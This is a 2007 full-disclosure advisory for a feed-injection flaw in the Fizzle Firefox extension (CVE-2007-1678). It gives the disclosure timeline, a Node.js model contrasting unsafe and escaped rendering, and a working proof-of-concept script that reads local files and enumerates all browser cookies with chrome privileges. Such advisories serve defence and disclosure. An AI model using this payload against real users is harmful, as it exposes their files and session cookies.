SecurityReason.com - Our Reason is Security


Topic: Fizzle : Firefox Extension Vulnerability


SecurityAlert: 2480
CVE: CVE-2007-1678
SecurityRisk: Medium
Remote Exploit: No
Local Exploit: Yes
Exploit Available: Yes
Credit: CrYpTiC MauleR
Published: 30.03.2007

Affected Software: Fizzle : Firefox Extension



Advisory Content:

Fizzle allows feeds to use HTML in feed data, resulting in JavaScript being
run in the chrome: window with chrome permissions. The extension converts
HTML entities back to their ASCII equivalents, so &lt; becomes < and so
forth. Various feed fields are vulnerable, including the title, which allows
the code to execute as soon as Fizzle is opened, with no need for the feed
to be viewed.

The author Andy Frank was notified about the issue on 01/29/2007; we
corresponded on the issue and I even offered to create a patch, which I did.
The patch did not meet his liking since the sanitation was too strict and
made some feeds that use certain tags like <p> for formatting lose their
layout. I told him it would be too difficult to sanitize the data unless it
is strict, because so many attack variations could be used, and the best
thing to do is not allow HTML at all in the feed. On 02/20/2007 we ended
discussions on this and I notified addons.mozilla.org about the problem and
the developer's lack of concern in fixing the extension, or at least
disabling its download so people would not download the extension. Well,
Mozilla didn't bother to remove it and has chosen to remove the extension at
a future date when addons.mozilla.org is updated. Since then over 2,000+
users have additionally downloaded the extension, prompting me to go
full-disclosure about it.

Fizzle 0.5 (previous versions likely vulnerable as well)
https://addons.mozilla.org/firefox/1307/

Below is the example I have tested using version 0.5 under nightly Firefox.
Please note that the HTML entities must be present for the exploit to work.
Place the below in your feed body and subscribe to the feed. View the feed
in Fizzle. When testing, make sure you clear the Fizzle cache in the fizzle
folder under the Firefox profile.

An attacker can check if a feed subscriber has Fizzle because Fizzle's HTTP
request sends a custom user-agent which has the word 'Fizzle' in it.
Detecting that keyword, an attacker can serve a malicious copy of the feed
instead.
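The chain described in the two paragraphs above (a feed server that hands the payload only to a Fizzle user-agent, and a reader that decodes entities in feed text and then inserts the result as markup) modelled in plain Node.js, as an added example; this is not code from the advisory or from the Fizzle extension. The user-agent strings, feed titles and renderer functions are constructed for the demonstration, since the advisory does not give the exact Fizzle user-agent format. The hardened renderer shows the alternative the advisory argues for: feed text stays text, with no tag allow-list to get wrong.

```javascript
// Added example: not code from the original advisory or from the Fizzle
// extension. Models the attack chain described above in plain Node.js.
//   1. Server side: an attacker's feed endpoint picks its payload from the
//      User-Agent, which works because Fizzle's requests carry the word
//      "Fizzle" (the advisory says so; the exact UA format is not given,
//      so the strings below are constructed).
//   2. Client side: a reader that decodes HTML entities in feed text and
//      then inserts the result as markup (the behaviour the advisory
//      describes) next to one that keeps feed text as text.

// Constructed sample data.
const FIZZLE_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9a3pre) Gecko/20070330 Fizzle/0.5";
const BROWSER_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3";
const BENIGN_TITLE = "Weekly release notes";
const PAYLOAD_TITLE = "&lt;script&gt;alert(1)&lt;/script&gt;"; // entity-encoded, as the advisory requires

// Attacker's feed server: only clients that identify as Fizzle get the
// payload, so anyone checking the feed in a normal browser sees nothing odd.
function chooseFeedTitle(userAgent) {
  return /\bFizzle\b/i.test(userAgent || "") ? PAYLOAD_TITLE : BENIGN_TITLE;
}

// Single-pass HTML entity decoder standing in for the extension's
// "convert entities back to ASCII" step. Single pass matters: "&amp;lt;"
// must become "&lt;", not "<".
const NAMED_ENTITIES = { lt: "<", gt: ">", amp: "&", quot: "\"", apos: "'" };
function decodeEntities(text) {
  return text.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1] === "x" || body[1] === "X";
      const code = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return code <= 0x10ffff ? String.fromCodePoint(code) : match;
    }
    const name = body.toLowerCase();
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, name) ? NAMED_ENTITIES[name] : match;
  });
}

// Escaper for the hardened path: whatever the feed says, it renders as text.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", "\"": "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable renderer: decoded feed text is concatenated into markup, the
// string equivalent of element.innerHTML = decodeEntities(title).
function renderTitleUnsafe(title) {
  return "<div class=\"title\">" + decodeEntities(title) + "</div>";
}

// Hardened renderer: decode once so "&amp;" still displays as "&", then
// escape before the string reaches a markup parser (the string equivalent
// of element.textContent = decodeEntities(title)).
function renderTitleSafe(title) {
  return "<div class=\"title\">" + escapeHtml(decodeEntities(title)) + "</div>";
}

// Crude tester's check on rendered output: did anything a markup parser
// would treat as active content survive rendering?
function containsActiveMarkup(html) {
  return /<\s*script\b|<[^>]*\son[a-z]+\s*=|javascript\s*:/i.test(html);
}

// End-to-end: what a given client would be served and how each renderer
// treats it.
function simulateFetch(userAgent, renderer) {
  return renderer(chooseFeedTitle(userAgent));
}

// Stand-alone demo.
for (const ua of [BROWSER_UA, FIZZLE_UA]) {
  const title = chooseFeedTitle(ua);
  console.log(`${/Fizzle/.test(ua) ? "Fizzle" : "browser"} client served title ${JSON.stringify(title)}`);
  console.log("  unsafe render contains active markup:", containsActiveMarkup(renderTitleUnsafe(title)));
  console.log("  safe render contains active markup:  ", containsActiveMarkup(renderTitleSafe(title)));
}
```

The server-side branch is why a defender looking at the feed from a normal browser, or from the server's own logs, may never see the payload; when investigating a report like this one, fetch the feed with the suspect client's user-agent (or a copy of it) and diff the two responses.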

------------------------------------------------------------------------
POC: Local File Reading and Cookie Reading (The HTML entities MUST be used)
------------------------------------------------------------------------
&lt;script&gt;

function read(readfile)
{
    // Chrome-privileged XPCOM file access: this is what running in the
    // chrome: window (rather than in a content page) makes possible.
    var file = Components.classes["@mozilla.org/file/local;1"]
                         .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(readfile);
    var is = Components.classes["@mozilla.org/network/file-input-stream;1"]
                       .createInstance(Components.interfaces.nsIFileInputStream);
    is.init(file, 0x01, 00004, null);   // 0x01 = PR_RDONLY, 00004 = permission bits, null = no behaviour flags
    var sis = Components.classes["@mozilla.org/scriptableinputstream;1"]
                        .createInstance(Components.interfaces.nsIScriptableInputStream);
    sis.init(is);
    var output = sis.read(sis.available());
    alert(output);
}
read("C:\\test.txt");   // any local file the Firefox user can read

function getCookies()
{
    // nsICookieManager enumerates every stored cookie for every host;
    // there is no same-origin check because the caller is chrome.
    var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]
                                  .getService(Components.interfaces.nsICookieManager);
    var str = '';
    var iter = cookieManager.enumerator;
    while (iter.hasMoreElements())
    {
        var cookie = iter.getNext();
        if (cookie instanceof Components.interfaces.nsICookie)
        {
            str += "Host: " + cookie.host
                 + "\nName: " + cookie.name
                 + "\nValue: " + cookie.value
                 + "\n\n";
        }
    }
    alert(str);
}
getCookies()

&lt;/script&gt;
------------------------------------------------------------------------

I apologize for the blank emails before. Outblaze, the provider for my other
email, was for some reason sending the email as blank, so I am using this
account instead.

Regards,
CM.

Copyright © SecurityReason.com. All Rights Reserved.